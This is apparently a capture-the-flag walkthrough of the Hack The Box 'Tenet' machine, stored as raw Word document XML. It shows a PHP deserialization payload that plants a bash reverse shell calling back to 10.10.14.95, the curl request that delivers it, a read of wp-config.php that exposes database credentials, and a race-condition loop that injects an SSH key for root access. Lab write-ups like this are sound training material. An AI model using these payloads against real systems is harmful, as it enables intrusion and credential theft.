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521" w:rsidRDefault="00B42DB2">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2920C25D" wp14:editId="4F23D35D">
            <wp:extent cx="5943600" cy="2245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DE" w:rsidRDefault="007073DE"/>
    <w:p w:rsidR="003D304D" w:rsidRDefault="003D304D" w:rsidP="003D304D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7073DE" w:rsidRDefault="003D304D" w:rsidP="003D304D">
      <w:r>
        <w:t xml:space="preserve">└─#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-w /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/share/wordlists/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dirb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">/big.txt -t 50 -u </w:t>
      </w:r>
      <w:hyperlink r:id="rId5" w:history="1">
        <w:r w:rsidRPr="000A2CD6">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://10.10.10.223</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="003D304D" w:rsidRDefault="00765BA4" w:rsidP="003D304D">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3169C811" wp14:editId="6461AEA7">
            <wp:extent cx="5943600" cy="3369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A4" w:rsidRDefault="00765BA4" w:rsidP="003D304D"/>
    <w:p w:rsidR="00765BA4" w:rsidRDefault="00F631E5" w:rsidP="003D304D">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="368FAB0E" wp14:editId="31CD670C">
            <wp:extent cx="5943600" cy="5611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E5" w:rsidRDefault="00F631E5" w:rsidP="003D304D"/>
    <w:p w:rsidR="00F631E5" w:rsidRDefault="006030A7" w:rsidP="003D304D">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="69E718B5" wp14:editId="5F3207C6">
            <wp:extent cx="3171825" cy="59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A7" w:rsidRDefault="006030A7" w:rsidP="003D304D"/>
    <w:p w:rsidR="006030A7" w:rsidRDefault="00870F5F" w:rsidP="003D304D">
      <w:hyperlink r:id="rId9" w:anchor="comment-2" w:history="1">
        <w:r w:rsidR="003241CA" w:rsidRPr="000A2CD6">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://tenet.htb/index.php/2020/12/16/logs/#comment-2</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="003241CA" w:rsidRDefault="00FA09C6" w:rsidP="003D304D">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5874DACC" wp14:editId="24CD09BC">
            <wp:extent cx="5943600" cy="2969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C6" w:rsidRDefault="00FA09C6" w:rsidP="003D304D"/>
    <w:p w:rsidR="00FA09C6" w:rsidRDefault="00D51665" w:rsidP="003D304D">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="48DA3BB9" wp14:editId="48203671">
            <wp:extent cx="3714750" cy="657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65" w:rsidRDefault="00D51665" w:rsidP="003D304D"/>
    <w:p w:rsidR="00D51665" w:rsidRDefault="00870F5F" w:rsidP="003D304D">
      <w:hyperlink r:id="rId12" w:history="1">
        <w:r w:rsidR="00113E20" w:rsidRPr="000A2CD6">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://sator.tenet.htb/sator.php</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00113E20" w:rsidRDefault="003F3B84" w:rsidP="003D304D">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="552F9E10" wp14:editId="21DE8924">
            <wp:extent cx="5562600" cy="133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84" w:rsidRDefault="003F3B84" w:rsidP="003D304D"/>
    <w:p w:rsidR="003F3B84" w:rsidRDefault="001E6B7A" w:rsidP="003D304D">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0D22CF2A" wp14:editId="723A1403">
            <wp:extent cx="5943600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A8" w:rsidRDefault="004379BC" w:rsidP="003D304D">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3F91214F" wp14:editId="396D0ACC">
            <wp:extent cx="5943600" cy="4562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1F" w:rsidRDefault="0069101F" w:rsidP="003D304D"/>
    <w:p w:rsidR="0069101F" w:rsidRDefault="0069101F" w:rsidP="0069101F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69101F" w:rsidRDefault="0069101F" w:rsidP="0069101F">
      <w:r>
        <w:t xml:space="preserve">└─# </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -a    </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A003FC" w:rsidRDefault="00A003FC" w:rsidP="00A003FC">
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> &gt; class </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>DatabaseExport</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A003FC" w:rsidRDefault="00A003FC" w:rsidP="00A003FC">
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> {   public $</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>user_file</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = '</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>rce.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A003FC" w:rsidRDefault="00A003FC" w:rsidP="00A003FC">
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> {   public $data = '&lt;?</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> exec("/bin/bash -c \'bash -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> &gt; /dev/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/10.10.14.95/5555 0&gt;&amp;1\'"); ?&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A003FC" w:rsidRDefault="00A003FC" w:rsidP="00A003FC">
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> {   }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A003FC" w:rsidRDefault="00A003FC" w:rsidP="00A003FC">
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> &gt; </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0069101F" w:rsidRDefault="00A003FC" w:rsidP="00A003FC">
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> &gt; print </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>urlencode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">(serialize(new </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>DatabaseExport</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>));</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004379BC" w:rsidRDefault="00CC04D9" w:rsidP="003D304D">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6E00A55F" wp14:editId="79A3E672">
            <wp:extent cx="6438900" cy="1647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AC" w:rsidRDefault="00D346AC" w:rsidP="003D304D">
      <w:r>
        <w:t xml:space="preserve">Output: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D346AC" w:rsidRDefault="00EB7399" w:rsidP="003D304D">
      <w:r w:rsidRPr="00EB7399">
        <w:t>O%3A14%3A%22DatabaseExport%22%3A2%3A%7Bs%3A9%3A%22user_file%22%3Bs%3A7%3A%22rce.php%22%3Bs%3A4%3A%22data%22%3Bs%3A73%3A%22%3C%3Fphp+exec%28%22%2Fbin%2Fbash+-c+%27bash+-i+%3E+%2Fdev%2Ftcp%2F10.10.14.95%2F5555+0%3E%261%27%22%29%3B+%3F%3E%22%3B%7D</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009924C8" w:rsidRDefault="009924C8" w:rsidP="003D304D"/>
    <w:p w:rsidR="00B044C3" w:rsidRDefault="00B775AE" w:rsidP="003D304D">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="115001B1" wp14:editId="76BE25AD">
            <wp:extent cx="3095625" cy="723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AE" w:rsidRDefault="006A5130" w:rsidP="006A5130">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1785"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w:rsidR="006A5130" w:rsidRDefault="006A5130" w:rsidP="006A5130">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1785"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                                                                                                                                                                                                     </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006A5130" w:rsidRDefault="006A5130" w:rsidP="006A5130">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1785"/>
        </w:tabs>
      </w:pPr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6A5130" w:rsidRDefault="006A5130" w:rsidP="006A5130">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1785"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:t>└─# curl -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId18" w:history="1">
        <w:r w:rsidRPr="000A2CD6">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://sator.tenet.htb/sator.php?arepo=O%3A14%3A%22DatabaseExport%22%3A2%3A%7Bs%3A9%3A%22user_file%22%3Bs%3A7%3A%22rce.php%22%3Bs%3A4%3A%22data%22%3Bs%3A73%3A%22%3C%3Fphp+exec%28%22%2Fbin%2Fbash+-c+%27bash+-i+%3E+%2Fdev%2Ftcp%2F10.10.14.95%2F5555+0%3E%261%27%22%29%3B+%3F%3E%22%3B%7D</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="006A5130" w:rsidRDefault="006A5130" w:rsidP="006A5130">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1785"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="007A18E4" w:rsidRDefault="007A18E4" w:rsidP="003D304D">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="52C91A54" wp14:editId="37870F85">
            <wp:extent cx="5943600" cy="78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E4" w:rsidRDefault="007A18E4" w:rsidP="003D304D"/>
    <w:p w:rsidR="00F617CC" w:rsidRDefault="00FD1790" w:rsidP="003D304D">
      <w:r>
        <w:t>Now try to access</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FD1790" w:rsidRDefault="00870F5F" w:rsidP="003D304D">
      <w:hyperlink r:id="rId20" w:history="1">
        <w:r w:rsidR="00FD1790" w:rsidRPr="000A2CD6">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://sator.tenet.htb/rce.php</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00FD1790" w:rsidRDefault="00FD1790" w:rsidP="003D304D"/>
    <w:p w:rsidR="00FD1790" w:rsidRDefault="00FD1790" w:rsidP="003D304D">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>and</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> in return we get the shell</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FD1790" w:rsidRDefault="00B2384A" w:rsidP="003D304D">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="72D949F9" wp14:editId="0087E045">
            <wp:extent cx="5181600" cy="93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0F" w:rsidRDefault="00660D0F" w:rsidP="00660D0F">
      <w:r>
        <w:t xml:space="preserve">python3 -c 'import </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>pty</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>pty.spawn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>"/bin/bash")'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B2384A" w:rsidRDefault="00660D0F" w:rsidP="00660D0F">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>www-data@tenet</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>:/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>var</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">/www/html$ cd </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>wordpress</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00660D0F" w:rsidRDefault="003F1F57" w:rsidP="00660D0F">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003F1F57">
        <w:t>www-data@tenet</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003F1F57">
        <w:t>:/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003F1F57">
        <w:t>var</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003F1F57">
        <w:t>/www/html/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003F1F57">
        <w:t>wordpress</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003F1F57">
        <w:t xml:space="preserve">$ cat </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003F1F57">
        <w:t>wp-config.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="003F1F57" w:rsidRDefault="003F1F57" w:rsidP="00660D0F"/>
    <w:p w:rsidR="00B2384A" w:rsidRDefault="002B60B2" w:rsidP="003D304D">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="329EB863" wp14:editId="1C594155">
            <wp:extent cx="5943600" cy="707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B2" w:rsidRDefault="002B60B2" w:rsidP="003D304D"/>
    <w:p w:rsidR="002B60B2" w:rsidRDefault="001E1D9F" w:rsidP="003D304D">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="01A0A8DC" wp14:editId="039F3128">
            <wp:extent cx="5943600" cy="3853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E4" w:rsidRDefault="001E1D9F" w:rsidP="003D304D">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="411C1464" wp14:editId="3B34818A">
            <wp:extent cx="4171950" cy="1495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9F" w:rsidRDefault="001E1D9F" w:rsidP="003D304D"/>
    <w:p w:rsidR="001E1D9F" w:rsidRDefault="00596FD9" w:rsidP="003D304D">
      <w:r>
        <w:t>Output:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00596FD9" w:rsidRDefault="00596FD9" w:rsidP="00596FD9">
      <w:r>
        <w:t>/** MySQL database username */</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00596FD9" w:rsidRDefault="00596FD9" w:rsidP="00596FD9">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>define(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 'DB_USER', '</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>neil</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>' );</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00596FD9" w:rsidRDefault="00596FD9" w:rsidP="00596FD9"/>
    <w:p w:rsidR="00596FD9" w:rsidRDefault="00596FD9" w:rsidP="00596FD9">
      <w:r>
        <w:t>/** MySQL database password */</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00596FD9" w:rsidRDefault="00596FD9" w:rsidP="00596FD9">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>define(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 'DB_PASSWORD', 'Opera2112' );</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DE2FBC" w:rsidRDefault="00DE2FBC" w:rsidP="00596FD9"/>
    <w:p w:rsidR="00DE2FBC" w:rsidRDefault="00DE2FBC" w:rsidP="00596FD9">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="37A4AA95" wp14:editId="43599DF8">
            <wp:extent cx="3733800" cy="81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BC" w:rsidRDefault="00DE2FBC" w:rsidP="00596FD9"/>
    <w:p w:rsidR="00DE2FBC" w:rsidRDefault="000F4528" w:rsidP="00596FD9">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5AA6D8BF" wp14:editId="2155B514">
            <wp:extent cx="4495800" cy="2867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28" w:rsidRDefault="000F4528" w:rsidP="00596FD9"/>
    <w:p w:rsidR="000F4528" w:rsidRDefault="000F4528" w:rsidP="00596FD9">
      <w:r>
        <w:t xml:space="preserve">User.txt: </w:t>
      </w:r>
      <w:r w:rsidRPr="000F4528">
        <w:t>98b5e3836</w:t>
      </w:r>
      <w:r w:rsidR="00870F5F">
        <w:t>XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w:rsidR="000F4528" w:rsidRDefault="000F4528" w:rsidP="00596FD9"/>
    <w:p w:rsidR="000F4528" w:rsidRDefault="00BB164A" w:rsidP="00596FD9">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="518237C0" wp14:editId="4BC02E46">
            <wp:extent cx="5943600" cy="1336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4A" w:rsidRDefault="00BB164A" w:rsidP="00596FD9"/>
    <w:p w:rsidR="00BB164A" w:rsidRDefault="00F04779" w:rsidP="00596FD9">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0FF29BBD" wp14:editId="1A577A07">
            <wp:extent cx="5943600" cy="6272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79" w:rsidRDefault="00F04779" w:rsidP="00596FD9"/>
    <w:p w:rsidR="00F04779" w:rsidRDefault="00E23836" w:rsidP="00596FD9">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="06C488D5" wp14:editId="5A963E5C">
            <wp:extent cx="5943600" cy="561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36" w:rsidRDefault="00E23836" w:rsidP="00596FD9"/>
    <w:p w:rsidR="00820ECE" w:rsidRDefault="00820ECE" w:rsidP="00596FD9">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00820ECE">
        <w:t>neil@tenet</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00820ECE">
        <w:t xml:space="preserve">:~$ </w:t>
      </w:r>
      <w:r w:rsidR="00257168" w:rsidRPr="00257168">
        <w:t>while true; do echo "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00257168" w:rsidRPr="00257168">
        <w:t>ssh-rsa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00257168" w:rsidRPr="00257168">
        <w:t xml:space="preserve"> AAAAB3NzaC1yc2EAAAADAQABAAABgQCobAkntUKjO7Xn1xr4sLRJZUAabl6otmITeu0ZzkjmjvRpFtANu8d1iUwFiQIeyonvy2hsIhoWv39pNaqqDXvc/AEgVfmr1fuBODlUK+h+nmT01h4lzBI70AUYNCV5CqYe4xZ5wiI9</w:t>
      </w:r>
      <w:r w:rsidR="00257168" w:rsidRPr="00257168">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">dO/j8SLRzou7ql3668dSH5/SYJ7Kt8D/nJJc1fFm1L/qN8nGnXqcJHCvHdsETYsvrOj8cPQIsX7BFiMCb9XU+SbLIY0obxQblEjU7cG5DB6Z1+Qys8YqkVxOcrRJ7rNkvtAXD2rHY4n/tWg8u+g3Z23kajHHKJqUA8OO8EW678cx+G6M0SgpkclEFFK6eRX2fwN4rbgF8a8uxfo3YLqSE16tsosOzvS1k7TYez4ehoMr53NnbD6Afdg7VQ3wEtfIbu+tWharFynR0KVdl+3MtmKMyumvayYLWR2KcyRUhY8SHaTv44440n9XLx3ktlp3L/UdHXPmwrcchNhW65S72Dm8CEMuRYKzdluNlDmxGpwTnwYirtl+qNs= </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00257168" w:rsidRPr="00257168">
        <w:t>root@kali</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00257168" w:rsidRPr="00257168">
        <w:t>" | tee /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00257168" w:rsidRPr="00257168">
        <w:t>tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00257168" w:rsidRPr="00257168">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00257168" w:rsidRPr="00257168">
        <w:t>ssh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00257168" w:rsidRPr="00257168">
        <w:t>* &gt; /dev/null; done</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00820ECE" w:rsidRDefault="00820ECE" w:rsidP="00596FD9"/>
    <w:p w:rsidR="00596FD9" w:rsidRDefault="00812E0C" w:rsidP="00596FD9">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="17A406C0" wp14:editId="15E52ED9">
            <wp:extent cx="5943600" cy="2940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0C" w:rsidRDefault="00812E0C" w:rsidP="00596FD9"/>
    <w:p w:rsidR="00812E0C" w:rsidRDefault="003F5DBA" w:rsidP="00596FD9">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1B81E272" wp14:editId="461D688D">
            <wp:extent cx="5943600" cy="4531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BA" w:rsidRDefault="003F5DBA" w:rsidP="00596FD9"/>
    <w:p w:rsidR="003F5DBA" w:rsidRDefault="00017B0D" w:rsidP="00596FD9">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="307AA901" wp14:editId="3193FA9A">
            <wp:extent cx="5943600" cy="2518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0D" w:rsidRDefault="00017B0D" w:rsidP="00596FD9"/>
    <w:p w:rsidR="001E6B7A" w:rsidRDefault="00017B0D" w:rsidP="003D304D">
      <w:r>
        <w:t xml:space="preserve">Root.txt: </w:t>
      </w:r>
      <w:r w:rsidRPr="00017B0D">
        <w:t>dddbf25e</w:t>
      </w:r>
      <w:r w:rsidR="00870F5F">
        <w:t>XXXXXXXXXXXXXXXXXXXXXXXXXXXXX</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="001E6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DB2"/>
    <w:rsid w:val="00017B0D"/>
    <w:rsid w:val="000F4528"/>
    <w:rsid w:val="00113E20"/>
    <w:rsid w:val="001E1D9F"/>
    <w:rsid w:val="001E6B7A"/>
    <w:rsid w:val="00257168"/>
    <w:rsid w:val="002B60B2"/>
    <w:rsid w:val="003241CA"/>
